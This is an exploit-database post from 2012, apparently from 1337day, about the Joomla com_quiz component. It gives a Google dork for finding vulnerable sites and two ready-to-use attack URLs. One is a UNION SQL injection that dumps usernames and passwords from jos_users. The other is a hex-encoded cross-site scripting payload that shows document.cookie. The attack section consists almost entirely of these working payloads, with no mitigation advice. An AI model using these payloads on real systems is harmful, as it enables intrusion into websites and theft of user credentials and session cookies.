Home / exploitsPDF  

Joomla Quiz Cross Site Scripting / SQL Injection

Posted on 31 October 2012

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0 _ __ __ __ 1
 1 /'  __ /'__` / \__ /'__` 0
 0 /\_,  ___ /\_/\_   ___  ,_/ /  _ ___ 1
 1 /_/  /' _ ` / /_/_\_<_ /'___  /    /`'__ 0
 0   / /    /   / \__/  \_  \_   / 1
 1  \_ \_ \_\_   \____/ \____\ \__\ \____/ \_ 0
 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1
 1  \____/ >> Exploit database separated by exploit 0
 0 /___/ type (local, remote, DoS, etc.) 1
 1 1
 0 [+] Site : 1337day.com 0
 1 [+] Support e-mail : submit[at]1337day.com 1
 0 0
 1 ######################################### 1
 0 I'm D4NB4R member from Inj3ct0r Team 1
 1 ######################################### 0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

 #Exploit Title: Joomla com_quiz sql/xss Vulnerability

 Dork: inurl:index.php?option=com_quiz

 Date: [30-10-2012]

 Author: Daniel Barragan "D4NB4R"

 Twitter: @D4NB4R

 Vendor: N/A

 Version: N/A

 License: N/A

 Tested on: [Linux(Arch)-Windows(7ultimate)]

 Greetz: All Member Inj3ct0r Team * pilot * aku * navi_terrible * dedalo * ksha * shine* devboot * r0073r * indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz * By Over-X *Saoucha * Cyber Sec * theblind74 * onurozkan * n2n * Meher Assel * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te

Descripcion:

Software for online quiz

 Exploit 1:

 SQL : SQL injection

 http://localhost/index.php?option=com_quiz&task=user_tst_shw&Itemid={RANDOM}&tid={RANDOM}/**/and/**/1=0/**/union/**/select/**/1,0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e,concat(username,0x3D,password)/**/from/**/jos_users+--+

 Exploit 2: Xss Cross-site scripting

 http://localhost/index.php?option=com_quiz&task=user_tst_shw&Itemid={RANDOM}&tid={RANDOM}/**/and/**/1=0/**/union/**/select/**/1,0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e,0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e+--+

_____________________________________________________
Daniel Barragan "D4NB4R" 2012

 

TOP

Malware :

Exploits :